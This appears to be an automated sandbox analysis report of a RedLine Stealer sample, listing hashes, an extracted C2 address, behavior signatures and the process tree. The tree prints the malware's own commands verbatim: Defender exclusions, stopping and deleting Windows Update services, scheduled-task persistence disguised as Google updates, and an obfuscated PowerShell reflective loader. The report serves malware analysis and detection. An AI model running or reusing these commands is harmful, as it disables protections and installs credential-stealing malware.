Analysis
-
max time kernel
301s -
max time network
292s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
01-11-2022 09:09
General
-
Target
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe
-
Size
2.4MB
-
MD5
c1fe936433eb4be74eef3e7095f42d77
-
SHA1
b997230735a2a033647425441f908cb906047523
-
SHA256
409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14
-
SHA512
e33c1fec65c97cd2c5dabeb460ef83e2102201d9d9cf1c2789b7dfa65e2bb6063b927612a7bfc7eff234fc70ee14802af4fe134b8abeb00c4f6fea2adda8e7a6
-
SSDEEP
24576:cBqYYgYPXQh8RMpJRh9dM46/uN9X5koyLSAOtSL2SxgCl3RuQ55313V:cBmsIoyLSAOtSll3T
Malware Config
Extracted
redline
@mnogokupurbolshoykarman
77.73.134.24:80
-
auth_value
b555cfd27c33c447be45d0969d5f35d8
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 8 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 10 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {91FEAAAD-2294-4D2C-8C20-35E1ADAC0A0D} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"5⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu5⤵
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=5⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CA3EFE89-1A49-49F5-8DC4-60D253EB466E} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]3⤵
-
C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exeC:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
-
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{cf6956f5-5dcf-4fc7-8ea4-c72b3dd5a455}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{74620cbb-874f-48ee-90e3-82ab5c28abfc}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"C:\Users\Admin\AppData\Local\Temp\409cd2191cd5207704f590ca05b3ecd94bfe086f09c4aa87422e4126f04cab14.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Microsoft\brave.exe"C:\Users\Admin\AppData\Local\Microsoft\brave.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵
- Modifies security service
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC6⤵
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Drops file in Windows directory
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"C:\Users\Admin\AppData\Local\Microsoft\ofg.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd.exe" /C schtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- Suspicious use of WriteProcessMemory
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"C:\Users\Admin\AppData\Local\Microsoft\chrome.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 2005⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /TR "C:\Users\Admin\AppData\Local\Microsoft\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST1⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /tn \2h4dfns5mt /tr "C:\Users\Admin\AppData\Roaming\2h4dfns5mt\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f1⤵
- Creates scheduled task(s)
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2127428439-387115588-474629708-122997410818193653601109513171801454986-1254405721"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "129070741197830047150433440078180455-1989761494-1466258311-205524086-1249266345"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "801358140-7435095441584428054-778346473-137592661871822158220689907241436444237"1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "19519342621161056187-2077884082-1871805386-648724425168723342-103605484183994951"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-66575895316555899831171798690-484516680-11218911-1624779354-19392200241291459998"1⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"1⤵
- Drops file in Program Files directory
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
Filesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
9KB
MD5a169fb1a323c970f7a169b30657112cc
SHA15347dc5c0fe604f8527e336dd09a522fef0af9db
SHA25697ed6b5f63eabd5b09e6a8355673a34ade88b42ddb04d5d56219aa5d660f4e04
SHA5128bb8819e1e0c51d4e005f630042ad7b9851a1d1c63f330cf4752241320e70f6b54e15322f3524bbf21ebf8c90ff8b8c4254397c2eb6dcc86c74e43fd3f27b463
-
Filesize
7KB
MD527b3bdde8c5be454c2166299a7c56eee
SHA1d53b46bf15d883cd0c8ee51acefab10518488113
SHA2567d26ad7e7c45ce1f0f0bc87bb74b8a2f1c02819224796803a12cc0efbc5604be
SHA512a8c1ec00b2e9ee19b8a57d7d48abd7600781186faea48494371ddcd0aa9c8ea9c9560c8b403739006d30e3d7eee166b3a657c07c99a15444368884602d5493ce
-
Filesize
7KB
MD527b3bdde8c5be454c2166299a7c56eee
SHA1d53b46bf15d883cd0c8ee51acefab10518488113
SHA2567d26ad7e7c45ce1f0f0bc87bb74b8a2f1c02819224796803a12cc0efbc5604be
SHA512a8c1ec00b2e9ee19b8a57d7d48abd7600781186faea48494371ddcd0aa9c8ea9c9560c8b403739006d30e3d7eee166b3a657c07c99a15444368884602d5493ce
-
Filesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
Filesize
2.8MB
MD59253ed091d81e076a3037e12af3dc871
SHA1ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA25678e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA51229ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
SHA512908c06f2efee1ce9b17b8da562920fc37c3056c733600bf82dcf9cc6d93d1fb7b9dfceefba646ac9687d8b014eb69b7c1b35b16e5565a4c55cd694475af185e4
-
Filesize
6.8MB
MD573b9004ff373f3b7b2f595541deb5a02
SHA1bbc01bab5ae8ed8db2359c3b8a81eed75db5c061
SHA256b4a3efe944f33e75925e2d131097bbe1228b5eb34d6c24ec02bc58834443e5a7
